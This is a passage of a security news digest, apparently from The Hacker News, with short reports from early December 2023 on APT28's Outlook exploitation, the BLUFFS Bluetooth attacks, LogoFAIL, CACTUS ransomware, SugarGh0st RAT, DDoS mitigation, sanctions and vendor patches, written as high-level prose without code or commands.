The disclosure also comes as Lasso Security said it discovered 1,681 exposed API tokens on Hugging Face and GitHub, including those associated with Google, Meta, Microsoft, and VMware, that could be potentially exploited to stage supply chain, training data poisoning, and model theft attacks.
Microsoft Warns of Kremlin-Backed APT28 Exploiting Critical Outlook Vulnerability
5.12.23 APT The Hacker News
Microsoft on Monday said it detected Kremlin-backed nation-state activity exploiting a critical security flaw in its Outlook email service to gain unauthorized access to victims' accounts within Exchange servers.
The tech giant attributed the intrusions to a threat actor it called Forest Blizzard (formerly Strontium), which is also widely tracked under the monikers APT28, BlueDelta, Fancy Bear, FROZENLAKE, Iron Twilight, Sednit, and Sofacy.
The security vulnerability in question is CVE-2023-23397 (CVSS score: 9.8), a critical privilege escalation bug that could allow an adversary to access a user's Net-NTLMv2 hash that could then be used to conduct a relay attack against another service to authenticate as the user. It was patched by Microsoft in March 2023.
The goal, according to the Polish Cyber Command (DKWOC), was to obtain unauthorized access to mailboxes belonging to public and private entities in the country.
"In the next stage of malicious activity, the adversary modifies folder permissions within the victim's mailbox," DKWOC said. "In most cases, the modifications are to change the default permissions of the 'Default' group (all authenticated users in the Exchange organization) from 'None' to 'Owner.'"
In doing so, the contents of mailbox folders that have been granted this permission can be read by any authenticated person within the organization, enabling the threat actor to extract valuable information from high-value targets.
"It should be emphasized that the introduction of such modifications allows for the maintenance of unauthorized access to the contents of the mailbox even after losing direct access to it," DKWOC added.
Microsoft previously disclosed that the security shortcoming had been weaponized by Russia-based threat actors as a zero-day in attacks targeting government, transportation, energy, and military sectors in Europe since April 2022.
Subsequently, in June 2023, cybersecurity firm Recorded Future revealed details of a spear-phishing campaign orchestrated by APT28 exploiting multiple vulnerabilities in the open-source Roundcube webmail software, while simultaneously noting that the campaign overlaps with activity employing the Microsoft Outlook vulnerability.
The National Cybersecurity Agency of France (ANSSI), in late October, also blamed the hacking outfit for targeting government entities, businesses, universities, research institutes, and think tanks since the second half of 2021 by taking advantage of various flaws, counting CVE-2023-23397, to deploy implants such as CredoMap.
The state-sponsored group is assessed to be linked to Unit 26165 of the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU), the foreign intelligence arm of the Ministry of Defense.
Cybersecurity
In recent months, it has also been connected to attacks on various organizations in France and Ukraine as well as the abuse of the WinRAR flaw (CVE-2023-38831) to steal browser login data using a PowerShell script named IRONJAW.
"Forest Blizzard continually refines its footprint by employing new custom techniques and malware, suggesting that it is a well-resourced and well-trained group posing long-term challenges to attribution and tracking its activities," Microsoft said.
The popularity of Microsoft Outlook in enterprise environments makes it a lucrative attack vector, making it "one of the critical 'gateways' responsible for introducing various cyber threats into organizations," according to Check Point, which laid out the various means by which the service could be abused by bad actors to deliver their exploits.
The development comes as The Guardian reported that the Sellafield nuclear waste site in the U.K. had been breached by hacking crews associated with Russia and China to deploy "sleeper malware" as far back as 2015. However, the U.K. government said it found no evidence to suggest that its networks had been "successfully attacked by state actors."
New BLUFFS Bluetooth Attack Expose Devices to Adversary-in-the-Middle Attacks
5.12.23 Attack The Hacker News
New research has unearthed multiple novel attacks that break Bluetooth Classic's forward secrecy and future secrecy guarantees, resulting in adversary-in-the-middle (AitM) scenarios between two already connected peers.
The issues, collectively named BLUFFS, impact Bluetooth Core Specification 4.2 through 5.4. They are tracked under the identifier CVE-2023-24023 (CVSS score: 6.8) and were responsibly disclosed in October 2022.
The attacks "enable device impersonation and machine-in-the-middle across sessions by only compromising one session key," EURECOM researcher Daniele Antonioli said in a study published late last month.
This is made possible by leveraging two new flaws in the Bluetooth standard's session key derivation mechanism that allow the derivation of the same key across sessions.
While forward secrecy in key-agreement cryptographic protocols ensures that past communications are not revealed, even if the private keys to a particular exchange are revealed by a passive attacker, future secrecy (aka backward secrecy) guarantees the confidentiality of future messages should the past keys get corrupted.
In other words, forward secrecy protects past sessions against future compromises of keys.
The attack works by weaponizing four architectural vulnerabilities, including the aforementioned two flaws, in the specification of the Bluetooth session establishment process to derive a weak session key, and subsequently brute-force it to spoof arbitrary victims.
The AitM attacker impersonating the paired device could then negotiate a connection with the other end to establish a subsequent encryption procedure using legacy encryption.
In doing so, "an attacker in proximity may ensure that the same encryption key is used for every session while in proximity and force the lowest supported encryption key length," the Bluetooth Special Interest Group (SIG) said.
"Any conforming BR/EDR implementation is expected to be vulnerable to this attack on session key establishment, however, the impact may be limited by refusing access to host resources from a downgraded session, or by ensuring sufficient key entropy to make session key reuse of limited utility to an attacker."
Furthermore, an attacker can take advantage of the shortcomings to brute-force the encryption key in real-time, thereby enabling live injection attacks on traffic between vulnerable peers.
The success of the attack, however, presupposes that an attacking device is within the wireless range of two vulnerable Bluetooth devices initiating a pairing procedure and that the adversary can capture Bluetooth packets in plaintext and ciphertext, known as the victim's Bluetooth address, and craft Bluetooth packets.
As mitigations, SIG recommends that Bluetooth implementations reject service-level connections on an encrypted baseband link with key strengths below 7 octets, have devices operate in "Secure Connections Only Mode" to ensure sufficient key strength, and pair is done via "Secure Connections" mode as opposed the legacy mode.
The disclosure comes as ThreatLocker detailed a Bluetooth impersonation attack that can abuse the pairing mechanism to gain wireless access to Apple macOS systems via the Bluetooth connection and launch a reverse shell.
New P2PInfect Botnet MIPS Variant Targeting Routers and IoT Devices
5.12.23 BotNet The Hacker News
Cybersecurity researchers have discovered a new variant of an emerging botnet called P2PInfect that's capable of targeting routers and IoT devices.
The latest version, per Cado Security Labs, is compiled for Microprocessor without Interlocked Pipelined Stages (MIPS) architecture, broadening its capabilities and reach.
"It's highly likely that by targeting MIPS, the P2PInfect developers intend to infect routers and IoT devices with the malware," security researcher Matt Muir said in a report shared with The Hacker News.
P2PInfect, a Rust-based malware, was first disclosed back in July 2023, targeting unpatched Redis instances by exploiting a critical Lua sandbox escape vulnerability (CVE-2022-0543, CVSS score: 10.0) for initial access.
A subsequent analysis from the cloud security firm in September revealed a surge in P2PInfect activity, coinciding with the release of iterative variants of the malware.
The new artifacts, besides attempting to conduct SSH brute-force attacks on devices embedded with 32-bit MIPS processors, pack in updated evasion and anti-analysis techniques to fly under the radar.
The brute-force attempts against SSH servers identified during the scanning phase are carried out using common username and password pairs present within the ELF binary itself.
It's suspected that both SSH and Redis servers are propagation vectors for the MIPS variant owing to the fact that it's possible to run a Redis server on MIPS using an OpenWrt package known as redis-server.
One of the notable evasion methods used is a check to determine if it's being analyzed and, if so, terminate itself, as well as an attempt to disable Linux core dumps, which are files automatically generated by the kernel after a process crashes unexpectedly.
The MIPS variant also includes an embedded 64-bit Windows DLL module for Redis that allows for the execution of shell commands on a compromised system.
"Not only is this an interesting development in that it demonstrates a widening of scope for the developers behind P2PInfect (more supported processor architectures equals more nodes in the botnet itself), but the MIPS32 sample includes some notable defense evasion techniques," Cado said.
"This, combined with the malware's utilization of Rust (aiding cross-platform development) and rapid growth of the botnet itself, reinforces previous suggestions that this campaign is being conducted by a sophisticated threat actor."
LogoFAIL: UEFI Vulnerabilities Expose Devices to Stealth Malware Attacks
4.12.23 Attack The Hacker News
The Unified Extensible Firmware Interface (UEFI) code from various independent firmware/BIOS vendors (IBVs) has been found vulnerable to potential attacks through high-impact flaws in image parsing libraries embedded into the firmware.
The shortcomings, collectively labeled LogoFAIL by Binarly, "can be used by threat actors to deliver a malicious payload and bypass Secure Boot, Intel Boot Guard, and other security technologies by design."
Furthermore, they can be weaponized to bypass security solutions and deliver persistent malware to compromised systems during the boot phase by injecting a malicious logo image file into the EFI system partition.
While the issues are not silicon-specific, meaning they impact both x86 and ARM-based devices, they are also UEFI and IBV-specific. The vulnerabilities comprise a heap-based buffer overflow flaw and an out-of-bounds read, details of which are expected to be made public later this week at the Black Hat Europe conference.
Specifically, these vulnerabilities are triggered when the injected images are parsed, leading to the execution of payloads that could hijack the flow and bypass security mechanisms. "This attack vector can give an attacker an advantage in bypassing most endpoint security solutions and delivering a stealth firmware bootkit that will persist in an ESP partition or firmware capsule with a modified logo image," the firmware security company said. In doing so, threat actors could gain entrenched control over the impacted hosts, resulting in the deployment of persistent malware that can fly under the radar. Unlike BlackLotus or BootHole, it's worth noting that LogoFAIL doesn't break runtime integrity by modifying the boot loader or firmware component. The flaws affect all major IBVs like AMI, Insyde, and Phoenix as well as hundreds of consumer and enterprise-grade devices from vendors, including Intel, Acer, and Lenovo, making it both severe and widespread. The disclosure marks the first public demonstration of attack surfaces related to graphic image parsers embedded into the UEFI system firmware since 2009, when researchers Rafal Wojtczuk and Alexander Tereshkin presented how a BMP image parser bug could be exploited for malware persistence. "The types – and sheer volume – of security vulnerabilities discovered [...] show pure product security maturity and code quality in general on IBVs reference code," Binarly noted.
Microsoft Warns of Malvertising Scheme Spreading CACTUS Ransomware
4.12.23 Ransom The Hacker News
Microsoft has warned of a new wave of CACTUS ransomware attacks that leverage malvertising lures to deploy DanaBot as an initial access vector.
The DanaBot infections led to "hands-on-keyboard activity by ransomware operator Storm-0216 (Twisted Spider, UNC2198), culminating in the deployment of CACTUS ransomware," the Microsoft Threat Intelligence team said in a series of posts on X (formerly Twitter).
DanaBot, tracked by the tech giant as Storm-1044, is a multi-functional tool along the lines of Emotet, TrickBot, QakBot, and IcedID that's capable of acting as a stealer and a point of entry for next-stage payloads.
UNC2198, for its part, has been previously observed infecting endpoints with IcedID to deploy ransomware families such as Maze and Egregor, as detailed by Google-owned Mandiant in February 2021.
Per Microsoft, the threat actor has also taken advantage of initial access provided by QakBot infections. The change to DanaBot is likely the result of a coordinated law enforcement operation in August 2023 that took down QakBot's infrastructure.
"The current Danabot campaign, first observed in November, appears to be using a private version of the info-stealing malware instead of the malware-as-a-service offering," Redmond further noted.
The credentials harvested by the malware are transmitted to an actor-controlled server, which is followed by lateral movement via RDP sign-in attempts and ultimately handing off access to Storm-0216.
The disclosure comes days after Arctic Wolf revealed another set of CACTUS ransomware attacks that are actively exploiting critical vulnerabilities in a data analytics platform called Qlik Sense to gain access to corporate networks.
It also follows the discovery of a new macOS ransomware strain dubbed Turtle that's written in the Go programming language and is signed with an adhoc signature, thereby preventing it from being executed upon launch due to Gatekeeper protections.
Agent Racoon Backdoor Targets Organizations in Middle East, Africa, and U.S.
2.12.23 Virus The Hacker News
Organizations in the Middle East, Africa, and the U.S. have been targeted by an unknown threat actor to distribute a new backdoor called Agent Racoon.
"This malware family is written using the .NET framework and leverages the domain name service (DNS) protocol to create a covert channel and provide different backdoor functionalities," Palo Alto Networks Unit 42 researcher Chema Garcia said in a Friday analysis.
Targets of the attacks span various sectors such as education, real estate, retail, non-profits, telecom, and governments. The activity has not been attributed to a known threat actor, although it's assessed to be a nation-state aligned owing to the victimology pattern and the detection and defense evasion techniques used.
The cybersecurity firm is tracking the cluster under the moniker CL-STA-0002. It's currently not clear how these organizations were breached, and when the attacks took place.
Some of the other tools deployed by the adversary include a customized version of Mimikatz called Mimilite as well as a new utility called Ntospy, which utilizes a custom DLL module implementing a network provider to steal credentials to a remote server.
"While the attackers commonly used Ntospy across the affected organizations, the Mimilite tool and the Agent Racoon malware have only been found in nonprofit and government-related organizations' environments," Garcia explained.
It's worth pointing out a previously identified threat activity cluster known as CL-STA-0043 has also been linked to the use of Ntospy, with the adversary also targeting two organizations that have been targeted by CL-STA-0002.
Agent Raccoon, executed by means of scheduled tasks, allows for command execution, file uploading, and file downloading, while disguising itself as Google Update and Microsoft OneDrive Updater binaries.
The command-and-control (C2) infrastructure used in connection with the implant dates back to at least August 2020. An examination of VirusTotal submissions of the Agent Racoon artifacts shows that the earliest sample was uploaded in July 2022.
Unit 42 said it also uncovered evidence of successful data exfiltration from Microsoft Exchange Server environments, resulting in the theft of emails matching different search criteria. The threat actor has also been found to harvest victims' Roaming Profile.
"This tool set is not yet associated with a specific threat actor, and not entirely limited to a single cluster or campaign," Garcia said.
Russian Hacker Vladimir Dunaev Convicted for Creating TrickBot Malware
2.12.23 Virus The Hacker News
A Russian national has been found guilty in connection with his role in developing and deploying a malware known as TrickBot, the U.S. Department of Justice (DoJ) announced.
Vladimir Dunaev, 40, was arrested in South Korea in September 2021 and extradited to the U.S. a month later.
"Dunaev developed browser modifications and malicious tools that aided in credential harvesting and data mining from infected computers, facilitated and enhanced the remote access used by TrickBot actors, and created a program code to prevent the TrickBot malware from being detected by legitimate security software," the DoJ said.
"During Dunaev's participation in the scheme, 10 victims in the Northern District of Ohio, including Avon schools and a North Canton real-estate company, were defrauded of more than $3.4 million via ransomware deployed by TrickBot."
Dunaev, who pleaded guilty to committing computer fraud and identity theft and conspiracy to commit wire fraud and bank fraud, faces a maximum of 35 years in prison. He is scheduled to be sentenced on March 20, 2024.
Dunaev is also the second TrickBot gang malware developer to be arrested after Alla Witte, a Latvian national who, was sentenced to two years and eight months in prison in June 2023.
The development came nearly three months after the U.K. and U.S. governments sanctioned 11 individuals suspected of being part of the TrickBot cybercrime group.
TrickBot, which started off as a banking trojan in 2016, evolved into a multi-purpose tool capable of delivering additional payloads to infected hosts and acting as an initial access facilitator for ransomware attacks.
After surviving law enforcement to dismantle the botnet, the infamous Conti ransomware crew gained control over the operation. However, both Conti and TrickBot suffered a major blow last year following Russia's invasion of Ukraine, when Conti pledged allegiance to Russia.
This led to a series of leaks dubbed ContiLeaks and TrickLeaks that gave away valuable information about their internal chats and infrastructure, ultimately resulting in the shut down of Conti and its disintegration into numerous other groups.
New FjordPhantom Android Malware Targets Banking Apps in Southeast Asia
1.12.23 OS The Hacker News
Cybersecurity researchers have disclosed a new sophisticated Android malware called FjordPhantom that has been observed targeting users in Southeast Asian countries like Indonesia, Thailand, and Vietnam since early September 2023.
"Spreading primarily through messaging services, it combines app-based malware with social engineering to defraud banking customers," Oslo-based mobile app security firm Promon said in an analysis published Thursday.
Propagated mainly via email, SMS, and messaging apps, attack chains trick recipients into downloading a purported banking app that comes fitted with legitimate features but also incorporates rogue components.
Victims are then subjected to a social engineering technique akin to telephone-oriented attack delivery (TOAD), which involves calling a bogus call center to receive step-by-step instructions for running the app.
A key characteristic of the malware that sets it apart from other banking trojans of its kind is the use of virtualization to run malicious code in a container and fly under the radar.
The sneaky method, Promon said, breaks Android's sandbox protections as it allows different apps to be run on the same sandbox, enabling the malware to access sensitive data without requiring root access.
"Virtualization solutions like the one used by the malware can also be used to inject code into an application because the virtualization solution first loads its own code (and everything else found in its app) into a new process and then loads the code of the hosted application," security researcher Benjamin Adolphi said.
In the case of FjordPhantom, the host app downloaded includes a malicious module and the virtualization element that's then used to install and launch the embedded app of the targeted bank in a virtual container.
In other words, the bogus app is engineered to load the bank's legitimate app in a virtual container while also employing a hooking framework within the environment to alter the behavior of key APIs to grab sensitive information from the application's screen programmatically and close dialog boxes used to warn malicious activity on users' devices.
"FjordPhantom itself is written in a modular way to attack different banking apps," Adolphi said. "Depending on which banking app is embedded into the malware, it will perform various attacks on these apps."
Qakbot Takedown Aftermath: Mitigations and Protecting Against Future Threats
1.12.23 Virus The Hacker News
The U.S. Department of Justice (DOJ) and the FBI recently collaborated in a multinational operation to dismantle the notorious Qakbot malware and botnet. While the operation was successful in disrupting this long-running threat, concerns have arisen as it appears that Qakbot may still pose a danger in a reduced form. This article discusses the aftermath of the takedown, provides mitigation strategies, and offers guidance on determining past infections.
The Takedown and Its Limitations#
During the takedown operation, law enforcement secured court orders to remove Qakbot malware from infected devices remotely. It was discovered that the malware had infected a substantial number of devices, with 700,000 machines globally, including 200,000 computers in the U.S., being compromised at the time of the takedown. However, recent reports suggest that Qakbot is still active but in a diminished state.
The absence of arrests during the takedown operation indicates that only the command-and-control (C2) servers were affected, leaving the spam delivery infrastructure untouched. Therefore, the threat actors behind Qakbot continue to operate, presenting an ongoing threat.
Mitigations for Future Protection#
To safeguard against potential Qakbot resurgence or similar threats, the FBI, and the Cybersecurity & Infrastructure Security Agency (CISA) recommend several key mitigations:
Require Multi-Factor Authentication (MFA): Implement MFA for remote access to internal networks, particularly in critical infrastructure sectors like healthcare. MFA is highly effective in preventing automated cyberattacks.
Regularly Conduct Employee Security Training: Educate employees about security best practices, including avoiding clicking on suspicious links. Encourage practices like verifying the source of links and typing website names directly into browsers.
Update Corporate Software: Keep operating systems, applications, and firmware up to date. Use centralized patch management systems to ensure timely updates and assess the risk for each network asset.
Eliminate Weak Passwords: Comply with NIST guidelines for employee password policies and prioritize MFA over password reliance wherever possible.
Filter Network Traffic: Block ingoing and outgoing communications with known malicious IP addresses by implementing block/allow lists.
Develop a Recovery Plan: Prepare and maintain a recovery plan to guide security teams in the event of a breach.
Follow the "3-2-1" Backup Rule: Maintain at least three copies of critical data, with two stored in separate locations and one stored off-site.
Checking for Past Infections#
For individuals concerned about past Qakbot infections, there is some good news. The DOJ has recovered over 6.5 million stolen passwords and credentials from Qakbot's operators. To check if your login information has been exposed, you can use the following resources:
Have I Been Pwned: This widely known site allows you to check if your email address has been compromised in data breaches. It now includes the Qakbot dataset in its database.
Check Your Hack: Created by the Dutch National Police using Qakbot's seized data, this site lets you enter your email address and provides an automatic email notification if your address is found in the dataset.
World's Worst Passwords List: Since Qakbot utilizes a list of common passwords for brute-force attacks, you can check this list to ensure your password is not among the worst.
Conclusion#
While the takedown of Qakbot was a significant achievement, the threat landscape remains complex. There is a possibility of Qakbot's resurgence, given its operators' adaptability and resources. Staying vigilant and implementing security measures is crucial to prevent future infections. BlackBerry's CylanceENDPOINT solution is recommended to protect against Qakbot's execution, and specific rules within CylanceOPTICS can enhance protection against threats like Qakbot.
Chinese Hackers Using SugarGh0st RAT to Target South Korea and Uzbekistan
1.12.23 Virus The Hacker News
A suspected Chinese-speaking threat actor has been attributed to a malicious campaign that targets the Uzbekistan Ministry of Foreign Affairs and South Korean users with a remote access trojan called SugarGh0st RAT.
The activity, which commenced no later than August 2023, leverages two different infection sequences to deliver the malware, which is a customized variant of Gh0st RAT (aka Farfli).
It comes with features to "facilitate the remote administration tasks as directed by the C2 and modified communication protocol based on the similarity of the command structure and the strings used in the code," Cisco Talos researchers Ashley Shen and Chetan Raghuprasad said.
The attacks commence with a phishing email bearing decoy documents, opening which activates a multi-stage process that leads to the deployment of SugarGh0st RAT.
The decoy documents are incorporated within a heavily obfuscated JavaScript dropper that's contained within a Windows Shortcut file embedded in the RAR archive email attachment.
"The JavaScript decodes and drops the embedded files into the %TEMP% folder, including a batch script, a customized DLL loader, an encrypted SugarGh0st payload, and a decoy document," the researchers said.
The decoy document is then displayed to the victim, while, in the background, the batch script runs the DLL loader, which, in turn, side-loads it with a copied version of a legitimate Windows executable called rundll32.exe to decrypt and launch the SugarGh0st payload.
A second variant of the attack also begins with a RAR archive containing a malicious Windows Shortcut file that masquerades as a lure, with the difference being that the JavaScript leverages DynamicWrapperX to run shellcode that launches SugarGh0st.
SugarGh0st, a 32-bit dynamic-link library (DLL) written in C++, establishes contact with a hard-coded command-and-control (C2) domain, allowing it to transmit system metadata to the server, launch a reverse shell, and run arbitrary commands.
It can also enumerate and terminate processes, take screenshots, perform file operations, and even clear the machine's event logs in an attempt to cover its tracks and evade detection.
The campaign's links to China stem from Gh0st RAT's Chinese origins and the fact that the fully functional backdoor has been widely adopted by Chinese threat actors over the years, in part driven by the release of its source code in 2008. Another smoking gun evidence is the use of Chinese names in the "last modified by" field in the metadata of the decoy files.
"The Gh0st RAT malware is a mainstay in the Chinese threat actors' arsenal and has been active since at least 2008," the researchers said.
"Chinese actors also have a history of targeting Uzbekistan. The targeting of the Uzbekistan Ministry of Foreign Affairs also aligns with the scope of Chinese intelligence activity abroad."
The development comes as Chinese state-sponsored groups have also increasingly targeted Taiwan in the last six months, with the attackers repurposing residential routers to mask their intrusions, according to Google.
Discover How Gcore Thwarted Powerful 1.1Tbps and 1.6Tbps DDoS Attacks
1.12.23 Attack The Hacker News
The most recent Gcore Radar report and its aftermath have highlighted a dramatic increase in DDoS attacks across multiple industries. At the beginning of 2023, the average strength of attacks reached 800 Gbps, but now, even a peak as high as 1.5+ Tbps is unsurprising. To try and break through Gcore's defenses, perpetrators made two attempts with two different strategies. Read on to discover what happened and learn how the security provider stopped the attackers in their tracks without affecting end users' experiences.
A Powerful DDoS Attacks#
In November 2023, one of Gcore's customers from the gaming industry was targeted by two massive DDoS attacks, peaking at 1.1 and 1.6 Tbps respectively. The attackers deployed various techniques in an unsuccessful attempt to compromise Gcore's protective mechanisms.
Attack #1: 1.1 Tbps UDP-based DDoS#
In the first cyber assault, the attackers sent a barrage of UDP traffic to a target server, peaking at 1.1 Tbps. Two methods were employed:
By using random UDP source ports, they hoped to evade conventional filtering mechanisms.
The attackers concealed their genuine identity by forging source IP addresses.
This was a classic flood (or volumetric) attack, whereby the attackers hoped to consume all available bandwidth of or to a data center or network, overwhelming the target servers with traffic and making them unavailable to legitimate users.
The graph below shows customer's traffic during the attack. The peak of 1.1 Tbps shows an aggressive but short-lived attempt to flood the network with data. The green line ("total.general.input") shows all inbound traffic. The other colored lines on the graph represent the network's responses, including measures to filter and drop malicious traffic, as the system manages the deluge of data.
Line graphs showing a spike in a Gcore customer's network traffic, peaking at 1.1 Tbps, indicative of a substantial DDoS attack
The attack comprised a short but intense peak of 1.1 Tbps around 22:55
Attack #2: 1.6 Tbps TCP-based DDoS#
Graph of nine-hour attack with consistent traffic volume of 700 Mbps and peak of 1600 Mbps at the onset
The attack's consistent traffic volume was 700 Mbps and at the onset peaked at 1600 Mbps
This time, the attackers attempted to exploit TCP protocol with a mix of SYN flood, PSH, and ACK traffic.
In a SYN flood attack, several SYN packets are delivered to the target server without ACK packets. This means the server generates a half-open connection for each SYN packet. If successful, the server will ultimately run out of resources and stop accepting connections.
The PSH, ACK phase of the attack rapidly sends data to the target system. The ACK flag signals that the server received the previous packet. This pushes the system to handle data promptly, wasting resources. A SYN flood assault using PSH, ACK packets is harder to defend against than a SYN flood, since the PSH flag causes the server to process the packet contents immediately, consuming more resources.
As before, the goal was to overload the customer's servers and make their services inaccessible to authorized users. This SYN flood had a peak volume of 685.77 Mbps and the PSH, ACK had a magnitude of 906.73 Mbps.
Gcore's Defensive Strategies#
Gcore's DDoS Protection effectively neutralized both attacks while preserving regular service for the customer's end users. The general approach of fending off DDoS security threats includes several techniques, such as Gcore's front-line defenses:
Dynamic traffic shaping: Dynamically adjusted traffic rates effectively mitigate the impact of the attack while ensuring the continuity of critical services. In order to prioritize genuine traffic while slowing harmful transmissions, adaptive thresholds and rate restrictions are used.
Anomaly detection and quarantine: Models based on machine learning analyze behavior to identify anomalies. When an anomaly occurs, automated quarantine mechanisms redirect erroneous traffic to isolated segments for additional analysis.
Regular expression filters: To block malicious payloads without disrupting legitimate traffic, regular expression-based filter rules are implemented. Their continuous fine-tuning ensures optimal protection without false positives.
Collaborative threat intelligence: Gcore actively engages in the exchange of threat intelligence with industry peers. Collective insights and real-time threat feeds guide Gcore's security techniques, allowing a rapid response to developing attack vectors.
By employing these strategies, Gcore was able to effectively mitigate the impact of DDoS attacks and protect their customer's platform from disruption, negating potential reputational and financial losses.
Conclusion#
DDoS attacks of 1.5+ Tbps volume pose an increasing danger across industries, with attackers using imaginative techniques to try and bypass protection services. Over the course of 2023, Gcore has registered increases in both average and maximum attack volumes, and these two connected attacks demonstrate that trend.
In the attacks covered in the article, Gcore was able to prevent any damage through a combination of dynamic traffic shaping, anomaly detection, regular expression filters, and collaborative threat intelligence. Explore DDoS Protection options to secure your network against ever-evolving DDoS threats.
WhatsApp's New Secret Code Feature Lets Users Protect Private Chats with Password
1.12.23 Social The Hacker News
Meta-owned WhatsApp has launched a new Secret Code feature to help users protect sensitive conversations with a custom password on the messaging platform.
The feature has been described as an "additional way to protect those chats and make them harder to find if someone has access to your phone or you share a phone with someone else."
Secret Code builds on another feature called Chat Lock that WhatsApp announced in May, which moves chats to a separate folder of their own such that they can be accessed only upon providing their device password or biometrics.
By setting a unique password for these locked chats that are different from the password used to unlock the phone, the aim is to give users an additional layer of privacy, WhatsApp noted.
"You'll have the option to hide the Locked Chats folder from your chatlist so that they can only be discovered by typing your secret code in the search bar," it added.
The development comes weeks after WhatsApp introduced a "Protect IP Address in Calls" feature that masks users' IP addresses to other parties by relaying the calls through its servers. It also follows calls by the French government urging ministers, secretaries of state, and cabinet members to refrain from using popular messaging apps like WhatsApp, Signal, and Telegram in favor of homegrown alternatives like Tchap (based on the Matrix protocol) and Olvid by December 8, 2023. The news, which was first reported by Le Point, cited a circulated document that claimed: "these digital tools are not devoid of security vulnerabilities and therefore do not ensure the security of conversations and information shared through them." In response, Meredith Whittaker, president of Signal, hit back at the French government's decision, stating, "this claim is not backed by any evidence, and is dangerously misleading esp. coming from gov." Will Cathcart, the head of WhatsApp, concurred, saying, "we are of the same opinion."
U.S. Treasury Sanctions North Korean Kimsuky Hackers and 8 Foreign-Based Agents
1.12.23 BigBrothers The Hacker News
The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) on Thursday sanctioned the North Korea-linked adversarial collective known as Kimsuky as well as eight foreign-based agents who are alleged to have facilitated sanctions evasion.
The agents, the Treasury said, helped in "revenue generation and missile-related technology procurement that support the DPRK's weapons of mass destruction (WMD) programs."
The sanctions against Kimsuky, which have been levied for gathering intelligence to support the regime's strategic objectives, come more than four years after the OFAC imposed similar measures against the Lazarus Group and its offshoots Andariel and BlueNoroff in September 2019.
The actions are in response to North Korea's launch of a military reconnaissance satellite late last month, the Treasury added. They also arrive a day after a virtual currency mixer service called Sinbad was sanctioned for processing stolen assets linked to hacks perpetrated by the Lazarus Group.
Kimsuky – also called APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima – is a prolific cyber espionage crew that primarily targets governments, nuclear organizations, and foreign relations entities to collect intelligence that help further North Korea's interests.
"The group combines moderately sophisticated technical capabilities with aggressive social engineering tactics, especially against South Korean and U.S.-based government organizations, academics, and think tanks focused on Korean peninsula geopolitical issues," Google-owned Mandiant noted in October 2023.
Like the Lazarus Group, it's also an element within the Reconnaissance General Bureau (RGB), which is North Korea's primary foreign intelligence service that's responsible for intelligence collection operations. It's known to be active since at least 2012.
"Kimsuky employs social engineering to collect intelligence on geopolitical events, foreign policy strategies, and diplomatic efforts affecting its interests by gaining illicit access to the private documents, research, and communications of their targets," the Treasury said.
The agency also identified Kang Kyong Il, Ri Sung Il, and Kang Phyong Guk for acting as weapons sales representatives; So Myong, Choe Un Hyok, and Jang Myong Chol for engaging in illicit financial transfers to procure material for North Korea's missile programs; and Choe Song Chol and Im Song Sun for running front companies involved in generating revenue by exporting skilled workers.
"The geographic breakdown of North Korean threat groups' targeting in the cryptocurrency industry [follows a multi-pronged approach], where Kimsuky has been seen targeting the cryptocurrency industry in South Korea, and Lazarus Group has a more global presence in their cryptocurrency targeting operations," Recorded Future said in a new report published this week.
Zyxel Releases Patches to Fix 15 Flaws in NAS, Firewall, and AP Devices
1.12.23 Vulnerebility The Hacker News
Zyxel has released patches to address 15 security issues impacting network-attached storage (NAS), firewall, and access point (AP) devices, including three critical flaws that could lead to authentication bypass and command injection.
The three vulnerabilities are listed below -
CVE-2023-35138 (CVSS score: 9.8) - A command injection vulnerability that could allow an unauthenticated attacker to execute some operating system commands by sending a crafted HTTP POST request.
CVE-2023-4473 (CVSS score: 9.8) - A command injection vulnerability in the web server that could allow an unauthenticated attacker to execute some operating system commands by sending a crafted URL to a vulnerable device.
CVE-2023-4474 (CVSS score: 9.8) - An improper neutralization of special elements vulnerability that could allow an unauthenticated attacker to execute some operating system commands by sending a crafted URL to a vulnerable device.
Also patched by Zyxel are three high-severity flaws (CVE-2023-35137, CVE-2023-37927, and CVE-2023-37928) that, if successfully exploited, could allow attackers to obtain system information and execute arbitrary commands. It's worth noting that both CVE-2023-37927 and CVE-2023-37928 require authentication.
The flaws impact the following models and versions -
NAS326 - versions V5.21(AAZF.14)C0 and earlier (Patched in V5.21(AAZF.15)C0)
NAS542 - versions V5.21(ABAG.11)C0 and earlier (Patched in V5.21(ABAG.12)C0)
The advisory comes days after the Taiwanese networking vendor shipped fixes for nine flaws in select firewall and access point (AP) versions, some of which could be weaponized to access system files and administrator logs, as well as cause a denial-of-service (DoS) condition.
With Zyxel devices often exploited by threat actors, it's highly recommended that users apply the latest updates to mitigate potential threats.
Zero-Day Alert: Apple Rolls Out iOS, macOS, and Safari Patches for 2 Actively Exploited Flaws
1.12.23 OS The Hacker News
Apple has released software updates for iOS, iPadOS, macOS, and Safari web browser to address two security flaws that it said have come under active exploitation in the wild on older versions of its software.
The vulnerabilities, both of which reside in the WebKit web browser engine, are described below -
CVE-2023-42916 - An out-of-bounds read issue that could be exploited to leak sensitive information when processing web content.
CVE-2023-42917 - A memory corruption bug that could result in arbitrary code execution when processing web content.
Apple said it's aware of reports exploiting the shortcomings "against versions of iOS before iOS 16.7.1," which was released on October 10, 2023. Clément Lecigne of Google's Threat Analysis Group (TAG) has been credited with discovering and reporting the twin flaws.
The iPhone maker did not provide additional information regarding ongoing exploitation, but previously disclosed zero-days in iOS have been used to deliver mercenary spyware targeting high-risk individuals, such as activists, dissidents, journalists, and politicians.
It's worth pointing out here that every third-party web browser that's available for iOS and iPadOS, including Google Chrome, Mozilla Firefox, and Microsoft Edge, and others, are powered by the WebKit rendering engine due to restrictions imposed by Apple, making it a lucrative and broad attack surface.
The updates are available for the following devices and operating systems -
iOS 17.1.2 and iPadOS 17.1.2 - iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later
macOS Sonoma 14.1.2 - Macs running macOS Sonoma
Safari 17.1.2 - Macs running macOS Monterey and macOS Ventura
With the latest security fixes, Apple has remediated as many as 19 actively exploited zero-days since the start of 2023. It also comes days after Google shipped fixes for a high-severity flaw in Chrome (CVE-2023-6345) that has also come under real-world attacks, making it the seventh zero-day to be patched by the company this year.
